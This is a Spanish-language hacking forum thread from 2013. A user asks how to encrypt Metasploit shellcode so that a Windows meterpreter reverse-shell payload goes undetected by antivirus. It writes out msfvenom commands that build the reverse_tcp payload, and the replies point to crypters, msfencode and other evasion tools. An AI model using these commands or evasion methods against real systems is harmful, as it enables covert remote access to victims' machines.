[DUDA] Encriptar Shellcode

Iniciado por Metadato, Junio 23, 2013, 06:37:45 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 23, 2013, 06:37:45 AM Ultima modificación: Diciembre 08, 2014, 02:52:34 PM por Expermicid
Hola a todos!!! Bien, en esta ocasión tengo una duda que me está comiendo mucho la cabeza, por que busco y busco y no encuentro nada. Mi duda es que método o que hay que hacer para encriptar mi shellcode (de metasploit), he oído de alterar el shellcode pero no tengo ni idea de que hay que hacer, la shellcode a encriptar es la que me da de resultado al tipear lo siguiente en mi terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 C ó msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 -f c > shell.c (en C, que vendría a arrojar los mismo)


Las "XXX" las pongo para no poner la ip completa.

Y después de esto, ¿que hago con la shellcode, para hacer un ejecutable de windows?

LA VERDAD SOLO QUIERO TENER MI PAYLOAD FUD.

Saludós!!!

Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.

Por el foro hay un tuto del amigo sanko.

-Saludos-

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.

Por el foro hay un tuto del amigo sanko.

-Saludos-

Hola, bueno  aunque sea semi fud, no importa, ya he visto el post de sanko pero no lo entiendo muy bien, aun que esto corresponde comentarlo en su post jaja, pero bueno si me puedes decir metodos de encriptar este shellcode? Y una cosa este code que me da luego lo compilo con un compilador de C ?

Puede usar shinigami haciendo uso de msfvenom ;)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Vale muchas gracias por su ayuda, pero aparte de este método, ¿no hay más? ¿Podría funcionar con algún cryper? Por favor, proporcionarme si podéis los mejores métodos.

Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)


Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)


Regards,
Snifer


¿Podrías proporcionar algún tutorial? Muchas gracias!!

Por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te dejo uno que te servirá, un saludo ;)

Muchas gracias por la información, ¿los payloads tambien se pueden encriptar con un crypter?

Saludos.

Una recomendacion antes de todo no se dice encriptar ya que no existe el termino si no es cifrar!

No es posible porq.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Junio 24, 2013, 06:51:23 PM #10 Ultima modificación: Junio 24, 2013, 06:54:24 PM por Kodeinfect
Date un paso por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta..
Te daré una pista ~$ msfencode  ;)

EDIT: Por acá te dejo un vídeo que también podría ayudarte.